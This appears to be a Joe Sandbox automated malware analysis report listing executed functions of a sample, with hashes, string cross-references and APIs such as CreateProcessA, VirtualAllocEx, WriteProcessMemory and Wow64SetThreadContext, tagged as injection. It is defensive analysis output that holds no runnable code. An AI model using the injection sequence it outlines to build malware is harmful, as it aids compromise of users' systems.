$]q, xrefs: 069C0E1C
$]q, xrefs: 069C0F82
$]q, xrefs: 069C0DCC
$]q, xrefs: 069C0F76
$]q, xrefs: 069C0E42
$]q, xrefs: 069C0F50
$]q, xrefs: 069C0E4E
$]q, xrefs: 069C0F00

Memory Dump Source

Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69c0000_PO.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 981bb6536d9c2a81dd68228ef8790a1db337a58cd9418c4937910ae66aa1fcb1
Instruction ID: b0c3b879ef6a0f55bf2a2e0d9422306dae853feab5849bb9e7fa6eda5b57cf4e
Opcode Fuzzy Hash: 981bb6536d9c2a81dd68228ef8790a1db337a58cd9418c4937910ae66aa1fcb1
Instruction Fuzzy Hash: 4791DE30B00205CFDB44CB69C954ABEBBF6BF88710F14845AE806977A1CB3ADC41CB96

Analysis Process: AJzHYZtQIb.exePID: 8164, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	99%
Signature Coverage:	0%
Total number of Nodes:	297
Total number of Limit Nodes:	19

Executed Functions

Function 08D44FE8 Relevance: 6.7, Strings: 5, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 08D456BA
$]q, xrefs: 08D4561E
$]q, xrefs: 08D45608
'T, xrefs: 08D45552
$]q, xrefs: 08D456D0

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q$$]q$$]q
API String ID: 0-203493588
Opcode ID: 52a3439b1af31c67d80084b5e10c501ce0635a125a6e9418da387e03158ab12a
Instruction ID: aafa4291fdbbff8f926d06e85f509c5a2116cbbb983d799171f5bcad776712b8
Opcode Fuzzy Hash: 52a3439b1af31c67d80084b5e10c501ce0635a125a6e9418da387e03158ab12a
Instruction Fuzzy Hash: 87223674E19218CFDB14CFA9E98469DBBB2FF89341F10A56AD40ABB354DB309942CF14

Function 08D44FD8 Relevance: 4.2, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

$]q, xrefs: 08D456BA
$]q, xrefs: 08D45608
'T, xrefs: 08D45552

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 08a5efda849443fbd5a0de28e98d6c694066e49cffda61a663d7bc507966866a
Instruction ID: a9b403fd8903136635aab8dabfe695f8e0ca44be430932878462458e9c340b0d
Opcode Fuzzy Hash: 08a5efda849443fbd5a0de28e98d6c694066e49cffda61a663d7bc507966866a
Instruction Fuzzy Hash: 4F224574E15218CFDB14CFA9E984A9DBBB2FF89341F10A56AD40AB7354DB309942CF14

Function 08D4539C Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

$]q, xrefs: 08D456BA
$]q, xrefs: 08D45608
'T, xrefs: 08D45552

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: ea9f7b751f7030bfb43c28b692dbee90c12982a3363e4746f05a5643b3a79e7d
Instruction ID: 7ac6626e1d3f3b25ad99c7618e3c6f50cdc4fe9c069f231901d11a416172989b
Opcode Fuzzy Hash: ea9f7b751f7030bfb43c28b692dbee90c12982a3363e4746f05a5643b3a79e7d
Instruction Fuzzy Hash: A5A12C74E15218CFDB14CFA5E98479DBBB2FF88351F2095AAD40AA7354DB309A82CF14

Function 08D45387 Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

$]q, xrefs: 08D456BA
$]q, xrefs: 08D45608
'T, xrefs: 08D45552

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 3af945d987bd424c48b2366f6c36d0557991eec6be4c31f907d2f36fa18b31d7
Instruction ID: bc84145135907a8b52da7278a1042bfbb21d2ea6d6855a0861d5c9f36f6bc141
Opcode Fuzzy Hash: 3af945d987bd424c48b2366f6c36d0557991eec6be4c31f907d2f36fa18b31d7
Instruction Fuzzy Hash: 0AA12C74E15218CFDB14CFA5E98479DBBB2FF88351F2095AAD40AA7354DB309982CF14

Function 08D4540F Relevance: 3.9, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

$]q, xrefs: 08D456BA
$]q, xrefs: 08D45608
'T, xrefs: 08D45552

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 9f6d0b5fc57e7b6309302d131d3f6062ab0761789f15ac1e5fe1844d50c55523
Instruction ID: 26b2e707c2e6ed37b6403b6f21dd54ba1e606c04f8f70c18457c1b8e8de2f925
Opcode Fuzzy Hash: 9f6d0b5fc57e7b6309302d131d3f6062ab0761789f15ac1e5fe1844d50c55523
Instruction Fuzzy Hash: 9591F874E15218CFDB14CFA5E984B9DBBB2FF88351F1095AAE409A7354DB309982CF14

Function 08D42C18 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f7531a6f5759a52fde6a4bacaf8ebe12f6990baf4482fc9a1f8e338833cc1d
Instruction ID: 2409291be342c4d19b0871659340c7c83e2c6c4a0bf91721d0808dfc25d0a6cc
Opcode Fuzzy Hash: c6f7531a6f5759a52fde6a4bacaf8ebe12f6990baf4482fc9a1f8e338833cc1d
Instruction Fuzzy Hash: 6922D471D1061ACBCB15EF69C8506D9FBB1FF99300F1096AAE549B7210EB70AAD5CF80

Function 08D42C09 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d27b86b42d56e6620eaaf8ff902eb9866f3567cbfd29c6391590479cb95bf9f
Instruction ID: 56bb18bed37a143e2d5cba0cc2d49a9a27302b825cee4973e9c683d2665317b0
Opcode Fuzzy Hash: 8d27b86b42d56e6620eaaf8ff902eb9866f3567cbfd29c6391590479cb95bf9f
Instruction Fuzzy Hash: F502D371D10A1ACBCB15EF69C8506D9FBB1FF99300F1096AAE54977210EB70AAD5CF80

Function 08D496D0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a18239c27469aeb9b8b8a0d52fa753fd9f0c922277745393b33ec98182df7a
Instruction ID: 64cc3733fe4d2c053869ec4e2945c89fcd610239eb7f1bf9d89a94589fe38eff
Opcode Fuzzy Hash: 19a18239c27469aeb9b8b8a0d52fa753fd9f0c922277745393b33ec98182df7a
Instruction Fuzzy Hash: 8C91F475D04219EFCB18CFAAD89089EFFB2FB89351F24A52AD405BB264D7349943CB50

Function 08D44328 Relevance: 8.1, Strings: 6, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 08D4469D
$]q, xrefs: 08D446F0
$]q, xrefs: 08D44395
$]q, xrefs: 08D446FC
(aq, xrefs: 08D447B0
PH]q, xrefs: 08D44734

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: (aq$LR]q$PH]q$$]q$$]q$$]q
API String ID: 0-1937764415
Opcode ID: aec89646800dc4621e966a0074ce2bde6e0f2363fab9c65eb3b82c086eb898b4
Instruction ID: 4a8939cbef42282522dc3de31497a301c0ac810b715378fbbe6ce8eee5898ec0
Opcode Fuzzy Hash: aec89646800dc4621e966a0074ce2bde6e0f2363fab9c65eb3b82c086eb898b4
Instruction Fuzzy Hash: 16228F34714604CFDB04DFA4D4A9B6EBBB2FB88741F108218E9169B394CF76AD86CB54

Function 08D48398 Relevance: 7.7, Strings: 6, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 08D4857D
LR]q, xrefs: 08D4843A
$]q, xrefs: 08D48510
LR]q, xrefs: 08D4856F
LR]q, xrefs: 08D48448
$]q, xrefs: 08D48500

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
API String ID: 0-2875722158
Opcode ID: baf4c99bc6c9e83df0191fee828a08d9228717e0e8ec3d9c7ba5d9459ad22bc7
Instruction ID: 34cf34fbc128eaca4235d46e09ca34201b7462ab461550c7d80888144bdb7c41
Opcode Fuzzy Hash: baf4c99bc6c9e83df0191fee828a08d9228717e0e8ec3d9c7ba5d9459ad22bc7
Instruction Fuzzy Hash: DF71D471A04154CFCB158FA9D4587BDBBF1AB483C2F04A67AE4A5EB281C734DC82EB51

Function 07AA3F5C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AA419E

Strings

0|?!, xrefs: 07AA3FD2
0|?!, xrefs: 07AA3FA3

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: CreateProcess
String ID: 0|?!$0|?!
API String ID: 963392458-740985272
Opcode ID: 84f5eb40fde8a1be57f7786f519568c2fa15d5837b3dee5c718997fcdcff77f7
Instruction ID: f3f3fec002830f52ec52e58652689a198ccf1b95c564af6b6a4620d267c7639a
Opcode Fuzzy Hash: 84f5eb40fde8a1be57f7786f519568c2fa15d5837b3dee5c718997fcdcff77f7
Instruction Fuzzy Hash: 6CB18EB1D0065ADFDF20DFA9C8407EDBBB2BF49314F148569E818A7240DB749985CF92

Function 07AA3F68 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AA419E

Strings

0|?!, xrefs: 07AA3FD2
0|?!, xrefs: 07AA3FA3

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: CreateProcess
String ID: 0|?!$0|?!
API String ID: 963392458-740985272
Opcode ID: 3a372d672c027efadc9ec484bdc19c40c208d7d701b8ed6a332898fe53f715ca
Instruction ID: 583b0416f1bb0fb21b430338e67a2fb3cba0787493fd2d87e8c340562f739cb0
Opcode Fuzzy Hash: 3a372d672c027efadc9ec484bdc19c40c208d7d701b8ed6a332898fe53f715ca
Instruction Fuzzy Hash: 5B916EB1D0065ADFDF24CFA9C8407EDBBB2BF48314F148569E818A7240DBB59985CF92

Function 054622A4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054623C2

Strings

0|?!, xrefs: 054622DE
0|?!, xrefs: 054622FE

Memory Dump Source

Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd

Similarity

API ID: CreateWindow
String ID: 0|?!$0|?!
API String ID: 716092398-740985272
Opcode ID: 19fb984092be4580b656384744c83f21f9f47d3b6eb9f21c8cd48a8d29fbb62f
Instruction ID: b76f65c5d8d675d857d716dce3cbccd16d4b8912018d468989fe488c7326cc4b
Opcode Fuzzy Hash: 19fb984092be4580b656384744c83f21f9f47d3b6eb9f21c8cd48a8d29fbb62f
Instruction Fuzzy Hash: F951C2B5D04309EFDB14CFA9C984ADEBBB5BF48314F24812AE819AB210D7759885CF91

Function 054622B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054623C2

Strings

0|?!, xrefs: 054622DE
0|?!, xrefs: 054622FE

Memory Dump Source

Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd

Similarity

API ID: CreateWindow
String ID: 0|?!$0|?!
API String ID: 716092398-740985272
Opcode ID: 1ff8796bb0fa18731856a858800213e31a197b02abcc608f437f1a88b3ab73a4
Instruction ID: 31875c8612a3dee63dd8cab0fee2d68b2f56b0e743ad40e75a28cbaf71dcd10a
Opcode Fuzzy Hash: 1ff8796bb0fa18731856a858800213e31a197b02abcc608f437f1a88b3ab73a4
Instruction Fuzzy Hash: F641C3B5D04309AFDB14CF99C884ADEBBB5BF48310F24812AE819AB210D7B59885CF91

Function 08D442C7 Relevance: 5.2, Strings: 4, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 08D4469D
$]q, xrefs: 08D446F0
$]q, xrefs: 08D44395
PH]q, xrefs: 08D44734

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: LR]q$PH]q$$]q$$]q
API String ID: 0-3307124116
Opcode ID: b26ef213fc1639fff0b88a6d3160ea8339c7e3f2ccc4eb54b3e82e5b47534134
Instruction ID: a00895bc5a289d9386ee9052241fdcf4406c09f3ee2660c56b8582d888df26e9
Opcode Fuzzy Hash: b26ef213fc1639fff0b88a6d3160ea8339c7e3f2ccc4eb54b3e82e5b47534134
Instruction Fuzzy Hash: 6481EF31A02245CFCB14CFA8C994BADBBF2BF89741F249269D406DB394DB34D886CB54

Function 08D48387 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

LR]q, xrefs: 08D4843A
LR]q, xrefs: 08D4856F
$]q, xrefs: 08D48500

Memory Dump Source

Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q
API String ID: 0-2603884067
Opcode ID: 5fa6ed5f6041f98b4ec1ca43c54132dbe672477d7c54785f72be7a9d904e2fb4
Instruction ID: d3fcf720ee1e1480cca01992abfd5d2e2982dd2134453729eab7555c1d271681
Opcode Fuzzy Hash: 5fa6ed5f6041f98b4ec1ca43c54132dbe672477d7c54785f72be7a9d904e2fb4
Instruction Fuzzy Hash: AB61C572A04154CFD7118FA8D4547BDBBF1AB483C3F08A77AE0A5E7291C334D886AB11

Function 02D6B557 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02D6B7BE

Strings

0|?!, xrefs: 02D6B777

Memory Dump Source

Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd

Similarity

API ID: HandleModule
String ID: 0|?!
API String ID: 4139908857-2553515243
Opcode ID: 8d218c5508c9d0a0289f169d310ce360e3d763dbbe7a0d1ab1db5b5134183214
Instruction ID: 37add8a7e3e9805838b3936db9985c8a11a5dee528c4e254f53757d63eb184bb
Opcode Fuzzy Hash: 8d218c5508c9d0a0289f169d310ce360e3d763dbbe7a0d1ab1db5b5134183214
Instruction Fuzzy Hash: 8C813670A00B458FD724DF69D1547AABBF5FF88308F00892AD486EBB50DB74E949CB90

Function 02D64850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02D65DB9

Strings

0|?!, xrefs: 02D65D3C

Memory Dump Source

Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd

Similarity

API ID: Create
String ID: 0|?!
API String ID: 2289755597-2553515243
Opcode ID: b4dc124dbadf76d118f3e31ff07a17c3d1d7525dcf750f4e83464cfbfc07343f
Instruction ID: d30d3fe12b9d3c3265abf14bf06b4a903e0d2f06e9fb88434be34782a2bbfa67
Opcode Fuzzy Hash: b4dc124dbadf76d118f3e31ff07a17c3d1d7525dcf750f4e83464cfbfc07343f
Instruction Fuzzy Hash: BE41E3B1C00719CBDB24DFA9C888B9DBBB5BF48304F60806AD409AB355DB756986CF91

Function 02D65CFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02D65DB9

Strings

0|?!, xrefs: 02D65D3C

Memory Dump Source

Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd

Similarity

API ID: Create
String ID: 0|?!
API String ID: 2289755597-2553515243
Opcode ID: 7591468786c69cf4bcdf58fe6702ddbc816ebdb3c8c3cd0c34859420f9ada761
Instruction ID: 46a2a12608319dfff4b4d0f143d06b0b81f59a902d8df414d674b224f67b5a3c
Opcode Fuzzy Hash: 7591468786c69cf4bcdf58fe6702ddbc816ebdb3c8c3cd0c34859420f9ada761
Instruction Fuzzy Hash: E941D2B1C00619CFDB24CFA9C888BDDBBF6BF48304F64846AD408AB255DB755986CF91

Function 05464A00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05464AC1

Strings

0|?!, xrefs: 05464A17

Memory Dump Source

Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd

Similarity

API ID: CallProcWindow
String ID: 0|?!
API String ID: 2714655100-2553515243
Opcode ID: a3c1f8d96db291aae8f27793bc28907bac7be3b0f2fafab8399acda2b53b6fc5
Instruction ID: 3bb25bd749361b4d913df5835f48db620ccfcd45391ec8914c959d288e6b5ac6
Opcode Fuzzy Hash: a3c1f8d96db291aae8f27793bc28907bac7be3b0f2fafab8399acda2b53b6fc5
Instruction Fuzzy Hash: 094118B89003059FCB14CF99C489BAABBF6FF88314F24C499D519AB321D375A841CFA5

Function 07AA3CD9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AA3D70

Strings

0|?!, xrefs: 07AA3CFF

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: 0|?!
API String ID: 3559483778-2553515243
Opcode ID: ab05156c554022336830db5249851def4debcc379693e6c87fce38ee04a224fd
Instruction ID: 549ad7df7010b2322961cd88900b81956779f79c0e379905e6b4c135f42543bd
Opcode Fuzzy Hash: ab05156c554022336830db5249851def4debcc379693e6c87fce38ee04a224fd
Instruction Fuzzy Hash: 522135B1900349DFCB10DFAAC881BEEBBF5FF49310F108829E959A7240C7789944CBA0

Function 07AA3CE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AA3D70

Strings

0|?!, xrefs: 07AA3CFF

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: 0|?!
API String ID: 3559483778-2553515243
Opcode ID: eb847878fd67ded3b3fbe19d17706bc7412206e7447ae34c085b8f026aae2f5a
Instruction ID: 36592f25f98c821bbe6f33dae8dc56a5a89d951a0ea7d6ce2fa1f870cb1f41e0
Opcode Fuzzy Hash: eb847878fd67ded3b3fbe19d17706bc7412206e7447ae34c085b8f026aae2f5a
Instruction Fuzzy Hash: 4E21F6B59003599FCF10DFAAC885BEEBBF5FF48310F508829E919A7250C7789945CBA0

Function 07AA3B40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA3BC6

Strings

0|?!, xrefs: 07AA3B64

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: ContextThreadWow64
String ID: 0|?!
API String ID: 983334009-2553515243
Opcode ID: eb44108c57a2e02ece964e9bd6636f243af6645905aded9d325921b3e6b55aa7
Instruction ID: 3fe85d667b74ddccdce0238d10c8f77dd71b5c0a371152824f34279eedbe96cf
Opcode Fuzzy Hash: eb44108c57a2e02ece964e9bd6636f243af6645905aded9d325921b3e6b55aa7
Instruction Fuzzy Hash: C92148B19003099FDB10DFAAC4847AEBBF5EF89310F14842AD459A7240CB789985CBA0

Function 02D6C2E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D6DE16,?,?,?,?,?), ref: 02D6DED7

Strings

0|?!, xrefs: 02D6DE6F

Memory Dump Source

Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd

Similarity

API ID: DuplicateHandle
String ID: 0|?!
API String ID: 3793708945-2553515243
Opcode ID: bc80c9c4ff67d641f0571f1d8762406efeec7ce6e0ac630ce517e66bfaf025fe
Instruction ID: 72303989bb9340630e10d5ed8ae72e2f3da6a1610760b8f3aca04e0fae6eba83
Opcode Fuzzy Hash: bc80c9c4ff67d641f0571f1d8762406efeec7ce6e0ac630ce517e66bfaf025fe
Instruction Fuzzy Hash: 0521E5B59002089FDB10CF9AD984AEEBBF5EB48310F14845AE958A3311D378A944CFA4

Function 07AA3DC9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AA3E50

Strings

0|?!, xrefs: 07AA3DEF

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: MemoryProcessRead
String ID: 0|?!
API String ID: 1726664587-2553515243
Opcode ID: 5ab4515605753d4238e329af153f34bb5e0e8eac3ed291f463fad748211a30aa
Instruction ID: 316f1ad7e52f8d708bad92b6215cae0977e05757c64dbfe3e2949c2ba314aa8a
Opcode Fuzzy Hash: 5ab4515605753d4238e329af153f34bb5e0e8eac3ed291f463fad748211a30aa
Instruction Fuzzy Hash: 732114B19002599FDB10DFAAC880AEEFBF5FF48310F54842EE559A7240C7389945CBA1

Function 07AA3B48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA3BC6

Strings

0|?!, xrefs: 07AA3B64

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: ContextThreadWow64
String ID: 0|?!
API String ID: 983334009-2553515243
Opcode ID: 4e2a41104403568d11d0d54e8af9ddc69281f4eef3f9e4afa7bbb579a0eef31a
Instruction ID: fc5f995c44799b7c7987f1c5213513c9bb30c99c17010175ef6128977270f5b7
Opcode Fuzzy Hash: 4e2a41104403568d11d0d54e8af9ddc69281f4eef3f9e4afa7bbb579a0eef31a
Instruction Fuzzy Hash: F42129B1D003099FDB10DFAAC4857EEBBF5EF88314F54842AD519A7240CB78A945CFA1

Function 07AA3DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AA3E50

Strings

0|?!, xrefs: 07AA3DEF

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: MemoryProcessRead
String ID: 0|?!
API String ID: 1726664587-2553515243
Opcode ID: 192d37b192d351b2f0ff637967dfc6104db51c04cb9bc864af2baff08aeff54f
Instruction ID: 9854d2e897e5e1fad727926963a5457f2e83c5eef39ebbe087b8b11cd8c52be7
Opcode Fuzzy Hash: 192d37b192d351b2f0ff637967dfc6104db51c04cb9bc864af2baff08aeff54f
Instruction Fuzzy Hash: 5F21E4B18002599FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250C7789945CBA1

Function 07AA3C18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AA3C8E

Strings

0|?!, xrefs: 07AA3C37

Memory Dump Source

Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd

Similarity

API ID: AllocVirtual
String ID: 0|?!
API String ID: 4275171209-2553515243
Opcode ID: 4f882eb52fe004d15c40d45d8dfd8622071163ff8e1225a8a5e6f9d64c39382e
Instruction ID: b9a4e915dc594cdd1e879d17a48ab709644b8e1b93c58aeca940857a921d2736
Opcode Fuzzy Hash: 4f882eb52fe004d15c40d45d8dfd8622071163ff8e1225a8a5e6f9d64c39382e
Instruction Fuzzy Hash: 5A1129B5C002499FDB10DFAAC845AEEFFF6EF88314F108419E919A7250C7799954CFA1

